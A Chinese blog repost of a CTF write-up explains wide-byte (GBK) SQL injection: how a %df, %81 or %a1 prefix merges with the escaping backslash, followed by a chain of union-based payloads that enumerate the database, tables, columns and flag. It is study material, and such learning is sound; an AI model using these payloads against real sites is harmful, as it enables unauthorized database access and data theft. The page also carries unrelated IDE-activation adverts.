宽字节注入原理学习

宽字节注入原理学习0x01开篇本题用到考点是宽字节注入,遇到这种注入类型学习记录。推荐两篇链接:浅析白盒审计中的字符编码及SQL注入|离别歌Von的博客|VonBlog为方便自我下次忘记,总结一下:1.宽字节涉及到编码问题,便于理解需要看一看2.宽字节注入现在已经很少见,因为如今的编码大多使用utf-8常见url编码:空格–%20′–%27#–%23\–%5c0x02原理我们注入时都会简单输入一个’或者”,进行测试,如果数据库过滤不严格就会产生报错

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

0x01 开篇

本题用到考点是宽字节注入,遇到这种注入类型学习记录。

推荐两篇链接:浅析白盒审计中的字符编码及SQL注入 | 离别歌

Von的博客 | Von Blog

为方便自我下次忘记,总结一下:

1.宽字节涉及到编码问题,便于理解需要看一看

2.宽字节注入现在已经很少见,因为如今的编码大多使用utf-8

常见url编码:

空格 –%20

‘ –%27

# –%23

\ –%5c

0x02 原理

我们注入时都会简单输入一个 ‘ 或者 ” ,进行测试,如果数据库过滤不严格就会产生报错,宽字节注入会在 ‘ 前加入 \,加入反斜线之后,起到一个转义作用,这样,存在的 ‘ 就会失去注入的功能。

如下图所示,输入的 ‘ 被 \ 转义,注入功能失效,

宽字节注入原理学习

但是,如果输入这样的payload:1%df’,就会产生报错!

宽字节注入原理学习

这是什么逻辑呢?

GBK编码认为一个汉字占两个字节,%5c 是 / 的url编码,加上 %df ,前面两个字符就会拼接为 %df%5c被识别为一个汉字。这样,/ 自动消失,转义作用在此失效。重新构造出来的汉字叫这玩意“yun”。符合我的理解:真实存在但是浏览器不能很好识别。

宽字节注入原理学习

然后,我对%df产生疑问,为什么很多文章中使用的payload都用%df?

再次翻找文章并询问了周围大哥,得到答案。理论上讲,满足真实存在且不能被浏览器很好识别的汉字,并且编码能够包含%5c把 / 给弄没了的字符都可以。所以不必纠结为什么用%df,虽然我之前很纠结,哈哈哈。

像%81 、%a1经测试也是可以实现的,但是对应的汉字是什么我没有去找。

0x03 实例

明白原理,实例就和简单注入流程没有区别。为证明上述字符编码都可以实现,下面混淆使用,但效果是相同的。

猜字段

payload:1%81′ order by 1 %23

宽字节注入原理学习

测试到6出问题,可以判断5个字段

宽字节注入原理学习

union联合查询判断回显位置 payload:-1%a1′ union select 1,2,3,4,5 %23

宽字节注入原理学习

查询数据库名 payload: -1%df’ union select 1,database(),3,4,5 %23

宽字节注入原理学习

利用information_schema进行查询,需要注意的是,正常的payload是:-11%df’ union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=’kzf’ %23 , 但是如果你真的这样使用,发现无法回显的,经百度发现问题是’kzf’里面的 ‘ 问题,如果想正常回显比较好的解决办法是:直接把数据库名变为16进制

宽字节注入原理学习

payload:-11%df’ union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x6B7A66 %23

宽字节注入原理学习

得到表名this_flag,继续进行查询,还有这里有个神奇的问题。如果我输入payload:-1%df’ union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x746869735F666C6167 %23这条查询毫无问题,但是你会发现查询经常失败但一不小心就成功了,这里应该是它服务器的问题

宽字节注入原理学习

查询flag,payload:-1%df’ union select 1,2,group_concat(flag),4,5 from this_flag %23

宽字节注入原理学习

得到flag。

首发于2021-08-21 11:07

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/182181.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • window location href 跳转之后怎么获得后面带参数

    window location href 跳转之后怎么获得后面带参数functionGetRequest(){varurl=location.search;//获取url中"?"符后的字串vartheRequest=newObject();if(url.indexOf("?")!=-1){varstr=url…

  • spring源码解析之ConfigurationClassPostProcessor分析

    spring源码解析之ConfigurationClassPostProcessor分析

  • 学生学籍管理系统_学生学籍管理系统的开发

    学生学籍管理系统_学生学籍管理系统的开发二需求分析2.1系统功能要求设计此系统实现如下系统功能:我们小组所设计的学生学籍管理数据库系统主要分为两大模块层面,一是:学生登录层面,二是:教师登录层面。不同层面根据不同用户的需求所实现的功能不同,这样能够更人性化地贴合个体的使用,最大程度地提升系统的使用及运行效率。所以系统设有两种不同的登录选择,用户根据实际情况自行登录,修改、查询、管理信息。学生层面:(1)

    2022年10月16日
  • python无限锁屏「建议收藏」

    python无限锁屏「建议收藏」无限锁屏fromctypesimport*#可以利用python去调用dll动态库的包可以与c混编importtime#无限锁屏,利用python死循环deflock_windows(): whileTrue: #调用系统底层api,载入依赖库,系统运行时所需要的核心代码 user32=windll.LoadLibrary(‘user32.dll’…

  • 电容论坛(电感电容电压公式)

    玉山YGR智能电容以客为尊智能电容器模块是新一代无功补偿模块化装置,结合绿色智能电网的精神应用于绿色电网。产品以微电子技术为基础,集成了自动测控、无功优化、过零切换、多重保护、网络通信、大屏幕显示等技术,实现了低压无功补偿的全部功能,并改变不同的组合构造不同的补偿方案。它是一种智能化、模块化、标准化、集约化的无功补偿装置。 投切电容器组大约20-30毫秒内就完成一个全部动作,这种…

  • 无插件纯Web 3D机房,HTML5+WebGL倾力打造

    无插件纯Web 3D机房,HTML5+WebGL倾力打造前言-最近项目开发任务告一段落,刚好有时间整理这大半年的一些成果。使用html5时间还不久,对js的认识还不够深入。没办法,以前一直搞java,对js的一些语言特性和概念一时还转换不过来。上一篇大数

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号